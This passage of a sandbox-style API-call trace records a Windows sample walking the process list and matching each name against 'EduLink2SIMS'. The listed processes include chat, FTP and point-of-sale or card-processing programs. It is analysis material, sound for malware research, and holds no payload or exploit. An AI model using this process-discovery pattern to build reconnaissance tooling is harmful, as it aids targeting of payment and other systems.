lpString1="pidgin.exe") returned="pidgin.exe" [0101.000] StrStrIA (lpFirst="pidgin.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.000] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0101.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.001] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356eb68 [0101.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356eb68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0101.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0101.001] StrStrIA (lpFirst="scriptftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.001] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0101.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.002] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356ec88 [0101.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356ec88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0101.002] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0101.002] StrStrIA (lpFirst="skype.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.002] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0101.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.003] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e9b8 [0101.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e9b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.003] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0101.003] StrStrIA (lpFirst="smartftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.003] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0101.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.004] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e9d0 [0101.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356e9d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0101.005] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0101.005] StrStrIA (lpFirst="totalcmd.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.005] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0101.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.006] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356eb98 [0101.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356eb98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0101.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0101.006] StrStrIA (lpFirst="trillian.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.006] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0101.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.007] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e9a0 [0101.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356e9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0101.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0101.007] StrStrIA (lpFirst="webdrive.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.007] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0101.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.008] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ea90 [0101.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356ea90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0101.008] StrStrIA (lpFirst="whatsapp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.008] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0101.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.009] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ec40 [0101.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x356ec40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0101.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0101.009] StrStrIA (lpFirst="winscp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.009] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0101.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.010] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d6a8 [0101.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357d6a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0101.011] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0101.011] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.011] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0101.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.012] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d4c8 [0101.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357d4c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0101.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0101.012] StrStrIA (lpFirst="active-charge.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.012] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0101.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.013] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e9e8 [0101.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356e9e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0101.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0101.013] StrStrIA (lpFirst="accupos.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.013] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0101.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.014] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356eb80 [0101.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356eb80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0101.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0101.014] StrStrIA (lpFirst="afr38.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.014] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0101.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.016] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356eb08 [0101.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356eb08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0101.016] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0101.016] StrStrIA (lpFirst="aldelo.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.016] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0101.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.017] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356ea60 [0101.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356ea60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0101.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0101.018] StrStrIA (lpFirst="ccv_server.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.018] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0101.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.019] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357d6c8 [0101.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357d6c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0101.019] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0101.019] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.019] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0101.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.020] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d6e8 [0101.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357d6e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0101.020] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0101.020] StrStrIA (lpFirst="creditservice.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.020] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0101.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.021] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ead8 [0101.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356ead8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0101.021] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0101.021] StrStrIA (lpFirst="edcsvr.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.021] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0101.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.022] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356ebc8 [0101.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356ebc8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0101.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0101.022] StrStrIA (lpFirst="fpos.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.022] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0101.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.023] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ea00 [0101.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356ea00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0101.023] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0101.023] StrStrIA (lpFirst="isspos.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.023] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0101.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.025] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357ef60 [0101.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357ef60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0101.025] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0101.025] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.025] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0101.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.033] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356eb38 [0101.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356eb38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0101.033] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0101.033] StrStrIA (lpFirst="omnipos.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.033] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0101.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.034] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ec58 [0101.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x356ec58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0101.034] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0101.034] StrStrIA (lpFirst="spcwin.exe", lpSrch="EduLink2SIMS") returned 0x0 [0101.034] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0101.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.035] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357ed20 [0101.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357ed20, cbMultiByte=20, 